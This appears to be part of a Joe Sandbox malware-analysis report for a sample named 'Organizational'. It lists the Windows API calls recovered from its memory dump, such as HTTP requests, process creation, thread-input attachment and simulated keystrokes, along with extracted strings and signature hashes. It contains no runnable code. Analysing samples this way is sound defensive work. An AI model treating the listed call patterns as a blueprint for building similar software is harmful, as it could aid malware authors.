                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • CoInitialize.OLE32 ref: 00F68AED
                                                    • CoUninitialize.OLE32 ref: 00F68AF8
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00F83BBC,?), ref: 00F68B58
                                                    • IIDFromString.OLE32(?,?), ref: 00F68BCB
                                                    • VariantInit.OLEAUT32(?), ref: 00F68C65
                                                    • VariantClear.OLEAUT32(?), ref: 00F68CC6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: e6fa326c510f22a399b5f05f48c178a793ed084b30f10b4a279ddf4c1c378ba3
                                                    • Instruction ID: fad2da5c4933c3dc28f64851c23f7a52235b492d59fc907cccdd68e36436ddf2
                                                    • Opcode Fuzzy Hash: e6fa326c510f22a399b5f05f48c178a793ed084b30f10b4a279ddf4c1c378ba3
                                                    • Instruction Fuzzy Hash: 6861B0B16087119FC710DF14C889F6ABBE8EF85794F00090DF9819B291CB74ED49EBA2
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F5BB13
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F5BB89
                                                    • GetLastError.KERNEL32 ref: 00F5BB93
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00F5BC00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: e72ad2ee3a3611a04c194210407b4e82362f72d0c06df8be2622a65fa3f3ef74
                                                    • Instruction ID: 656674cdb596e5606ab14c4b5c7ce6c563420a3d71202957fdb0c6a9dcf538f8
                                                    • Opcode Fuzzy Hash: e72ad2ee3a3611a04c194210407b4e82362f72d0c06df8be2622a65fa3f3ef74
                                                    • Instruction Fuzzy Hash: E831D235A00209AFCB10DF68CC45EBEB7B4EF85311F108025EE05E72D6DBB59909EB91
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F49BCC
                                                    • GetDlgCtrlID.USER32 ref: 00F49BD7
                                                    • GetParent.USER32 ref: 00F49BF3
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F49BF6
                                                    • GetDlgCtrlID.USER32(?), ref: 00F49BFF
                                                    • GetParent.USER32(?), ref: 00F49C1B
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F49C1E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: 7463fbc521870c0253d40f4db5762bb635a862b75e7e02253a5c7d23e2c0fd17
                                                    • Instruction ID: 3b9fc17168ab49737c562eb693304b7222171e261c9c93897b8bbc7b1cba8e1e
                                                    • Opcode Fuzzy Hash: 7463fbc521870c0253d40f4db5762bb635a862b75e7e02253a5c7d23e2c0fd17
                                                    • Instruction Fuzzy Hash: 4221AE75E00109ABDF04AB60CC85EFEBBA9EF95310F100115F961932D1EB788919BB20
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F49CB5
                                                    • GetDlgCtrlID.USER32 ref: 00F49CC0
                                                    • GetParent.USER32 ref: 00F49CDC
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F49CDF
                                                    • GetDlgCtrlID.USER32(?), ref: 00F49CE8
                                                    • GetParent.USER32(?), ref: 00F49D04
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F49D07
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
APIs
• VariantInit.OLEAUT32(?), ref: 00F68FC1
• CoInitialize.OLE32(00000000), ref: 00F68FEE
• CoUninitialize.OLE32 ref: 00F68FF8
• GetRunningObjectTable.OLE32(00000000,?), ref: 00F690F8
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00F69225
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F83BDC), ref: 00F69259
• CoGetObject.OLE32(?,00000000,00F83BDC,?), ref: 00F6927C
• SetErrorMode.KERNEL32(00000000), ref: 00F6928F
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F6930F
• VariantClear.OLEAUT32(?), ref: 00F6931F
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00F519EF
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51A03
• GetWindowThreadProcessId.USER32(00000000), ref: 00F51A0A
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51A19
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00F51A2B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51A44
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51A56
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51A9B
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51AB0
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51ABB
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• GetSysColor.USER32(00000008), ref: 00EF260D
• SetTextColor.GDI32(?,000000FF), ref: 00EF2617
• SetBkMode.GDI32(?,00000001), ref: 00EF262C
• GetStockObject.GDI32(00000005), ref: 00EF2634
• GetClientRect.USER32(?), ref: 00F2C0FC
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00F2C113
• GetWindowDC.USER32(?), ref: 00F2C11F
• GetPixel.GDI32(00000000,?,?), ref: 00F2C12E
• ReleaseDC.USER32(?,00000000), ref: 00F2C140
• GetSysColor.USER32(00000005), ref: 00F2C15E
Similarity
• API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
• String ID:
• API String ID: 3430376129-0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EFADE1
• OleUninitialize.OLE32(?,00000000), ref: 00EFAE80
• UnregisterHotKey.USER32(?), ref: 00EFAFD7
• DestroyWindow.USER32(?), ref: 00F32F64
• FreeLibrary.KERNEL32(?), ref: 00F32FC9
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F32FF6
Strings
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
APIs
• EnumChildWindows.USER32(?,00F4B13A), ref: 00F4B078
Strings
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00EF327E
  • Part of subcall function 00EF218F: GetClientRect.USER32(?,?), ref: 00EF21B8
  • Part of subcall function 00EF218F: GetWindowRect.USER32(?,?), ref: 00EF21F9
  • Part of subcall function 00EF218F: ScreenToClient.USER32(?,?), ref: 00EF2221
• GetDC.USER32 ref: 00F2D073
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F2D086
• SelectObject.GDI32(00000000,00000000), ref: 00F2D094
• SelectObject.GDI32(00000000,00000000), ref: 00F2D0A9
• ReleaseDC.USER32(?,00000000), ref: 00F2D0B1
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F2D13C
Strings
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
  • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
  • Part of subcall function 00EF2714: GetCursorPos.USER32(?), ref: 00EF2727
  • Part of subcall function 00EF2714: ScreenToClient.USER32(00FB77B0,?), ref: 00EF2744
  • Part of subcall function 00EF2714: GetAsyncKeyState.USER32(00000001), ref: 00EF2769
  • Part of subcall function 00EF2714: GetAsyncKeyState.USER32(00000002), ref: 00EF2777
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00F7C69C
• ImageList_EndDrag.COMCTL32 ref: 00F7C6A2
• ReleaseCapture.USER32 ref: 00F7C6A8
• SetWindowTextW.USER32(?,00000000), ref: 00F7C752
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F7C765
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00F7C847
Strings
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F6211C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F62148
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F6218A
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F6219F
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F621AC
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F621DC
• InternetCloseHandle.WININET(00000000), ref: 00F62223
  • Part of subcall function 00F62B4F: GetLastError.KERNEL32(?,?,00F61EE3,00000000,00000000,00000001), ref: 00F62B64
  • Part of subcall function 00F62B4F: SetEvent.KERNEL32(?,?,00F61EE3,00000000,00000000,00000001), ref: 00F62B79
Strings
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
• API String ID: 2603140658-3916222277
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F80980), ref: 00F69412
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F80980), ref: 00F69446
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F695C0
• SysFreeString.OLEAUT32(?), ref: 00F695EA
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
APIs
• _memset.LIBCMT ref: 00F6FD9E
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F6FF31
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F6FF55
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F6FF95
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F6FFB7
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F70133
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F70165
• CloseHandle.KERNEL32(?), ref: 00F70194
• CloseHandle.KERNEL32(?), ref: 00F7020B
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
                                                    • Opcode ID: f0fef1fb0376ffde9a6e0e748523908d8a7557827a3f2482a1d3f70e54071b5e
                                                    • Instruction ID: 92f5ecca6324360cb555bcb350c835e54728daaf4142e93a92a546e540dd244d
                                                    • Opcode Fuzzy Hash: f0fef1fb0376ffde9a6e0e748523908d8a7557827a3f2482a1d3f70e54071b5e
                                                    • Instruction Fuzzy Hash: ABE1BD31604301DFC714EF24D891B6ABBE1EF85320F14896DF9999B2A2DB31EC45EB52
                                                    APIs
                                                      • Part of subcall function 00F54BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F53B8A,?), ref: 00F54BE0
                                                      • Part of subcall function 00F54BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F53B8A,?), ref: 00F54BF9
                                                      • Part of subcall function 00F54FEC: GetFileAttributesW.KERNEL32(?,00F53BFE), ref: 00F54FED
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F552FB
                                                    • _wcscmp.LIBCMT ref: 00F55315
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F55330
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 793581249-0
                                                    • Opcode ID: fcad3c99238d5be41d2e321b32f393cf5aaa26df05ae2dcdd6b99b99af19f350
                                                    • Instruction ID: d6d01ca743d200937a4ddc0a3020a979f6858526cb4ae2ffa4ab0485beff3cf4
                                                    • Opcode Fuzzy Hash: fcad3c99238d5be41d2e321b32f393cf5aaa26df05ae2dcdd6b99b99af19f350
                                                    • Instruction Fuzzy Hash: 095183B24087859BC764DBA0DC919DFB3ECAF84711F40491EB689C3052EF38A68C9766
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F78D24
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: d4ab69e5ea063ccea58143f87edd6f0ff2c5abe52b202f069c47390e5bbed5b5
                                                    • Instruction ID: 60e0665d1e4caf3023eb319564925564fe219ac0d17a0cf248444b2ec6d77c0b
                                                    • Opcode Fuzzy Hash: d4ab69e5ea063ccea58143f87edd6f0ff2c5abe52b202f069c47390e5bbed5b5
                                                    • Instruction Fuzzy Hash: B951A530A80208BFDB719B54CC8DBA97B65AB053A0F248517F618E61E1CF719951FB52
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F2C638
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F2C65A
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F2C672
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F2C690
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F2C6B1
                                                    • DestroyIcon.USER32(00000000), ref: 00F2C6C0
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F2C6DD
                                                    • DestroyIcon.USER32(?), ref: 00F2C6EC
                                                      • Part of subcall function 00F7AAD4: DeleteObject.GDI32(00000000), ref: 00F7AB0D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                    • String ID:
                                                    • API String ID: 2819616528-0
                                                    • Opcode ID: 149a7ec160c149548cd38547d49b99a58c28d5076fe5c778d1845b169721edb6
                                                    • Instruction ID: 462d78b7156fc6cf10f32a42d1340a2c5bdd2a73d1614a71567773291d7fc508
                                                    • Opcode Fuzzy Hash: 149a7ec160c149548cd38547d49b99a58c28d5076fe5c778d1845b169721edb6
                                                    • Instruction Fuzzy Hash: BF514A71A10209AFDB20DF24DC45BBA7BB5EB48720F10451CFA46A7290DB71ED90EF90
                                                    APIs
                                                      • Part of subcall function 00F4B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4B54D
                                                      • Part of subcall function 00F4B52D: GetCurrentThreadId.KERNEL32 ref: 00F4B554
                                                      • Part of subcall function 00F4B52D: AttachThreadInput.USER32(00000000,?,00F4A23B,?,00000001), ref: 00F4B55B
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4A246
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F4A263
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F4A266
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4A26F
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F4A28D
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F4A290
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4A299
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F4A2B0
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F4A2B3
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: 86bfdead0dfeb3a365d7212a425d7ed2d7ef794085694a2a61c312b37316bdf4
                                                    • Instruction ID: 76a4bf6fd3032195bea1b1e3cc563efe3a66aeaabe7aa3d087831769802162d9
                                                    • Opcode Fuzzy Hash: 86bfdead0dfeb3a365d7212a425d7ed2d7ef794085694a2a61c312b37316bdf4
                                                    • Instruction Fuzzy Hash: E511CEB1950618BEF6106B609C8EFBA7E2DEB4C760F900419F6406B0D1CEF25D50ABA0
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F4915A,00000B00,?,?), ref: 00F494E2
                                                    • HeapAlloc.KERNEL32(00000000,?,00F4915A,00000B00,?,?), ref: 00F494E9
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F4915A,00000B00,?,?), ref: 00F494FE
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00F4915A,00000B00,?,?), ref: 00F49506
                                                    • DuplicateHandle.KERNEL32(00000000,?,00F4915A,00000B00,?,?), ref: 00F49509
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F4915A,00000B00,?,?), ref: 00F49519
                                                    • GetCurrentProcess.KERNEL32(00F4915A,00000000,?,00F4915A,00000B00,?,?), ref: 00F49521
                                                    • DuplicateHandle.KERNEL32(00000000,?,00F4915A,00000B00,?,?), ref: 00F49524
                                                    • CreateThread.KERNEL32(00000000,00000000,00F4954A,00000000,00000000,00000000), ref: 00F4953E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 2c18018dcd26ce35a9f0bbe454746ebb8c032b70dc11b5d88c38f5838c67f9c7
                                                    • Instruction ID: 39f53ae4a8be3efafa219cd55fa2583fd1c83a188086211c389188a1acef7e5a
                                                    • Opcode Fuzzy Hash: 2c18018dcd26ce35a9f0bbe454746ebb8c032b70dc11b5d88c38f5838c67f9c7
                                                    • Instruction Fuzzy Hash: 3A01CDB6240708BFE750AFA5DC8DFAB7BACEB89711F504411FA05DB1A1DA709804DB20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    • Opcode ID: f436fe26217f7526830e5772419d7ce6d627d27a7118f38aa136390997e4148d
                                                    • Instruction ID: 3e92958e01502eef30e39e386d15de49760e70a55cd455b6c821f152b245ed4b
                                                    • Opcode Fuzzy Hash: f436fe26217f7526830e5772419d7ce6d627d27a7118f38aa136390997e4148d
                                                    • Instruction Fuzzy Hash: ADC18E71E0021A9BDF10DFA8C885AAEB7B5FF48310F148469E906BB280E771DD45EF91
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$_memset
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2862541840-625585964
                                                    • Opcode ID: d887c3eebf51251f063f33dfe20318c70458745b4404a88c703d7e211a3d8987
                                                    • Instruction ID: c128d5ee3659cdaf65cb04ae5f2e643bb3292596a1e1bea19a4ab01a2efc4036
                                                    • Opcode Fuzzy Hash: d887c3eebf51251f063f33dfe20318c70458745b4404a88c703d7e211a3d8987
                                                    • Instruction Fuzzy Hash: 6591AC71E04219ABCF24CFA5C884FAEBBB8EF85720F10855DF515AB281D7B49944DBA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F77449
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F7745D
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F77477
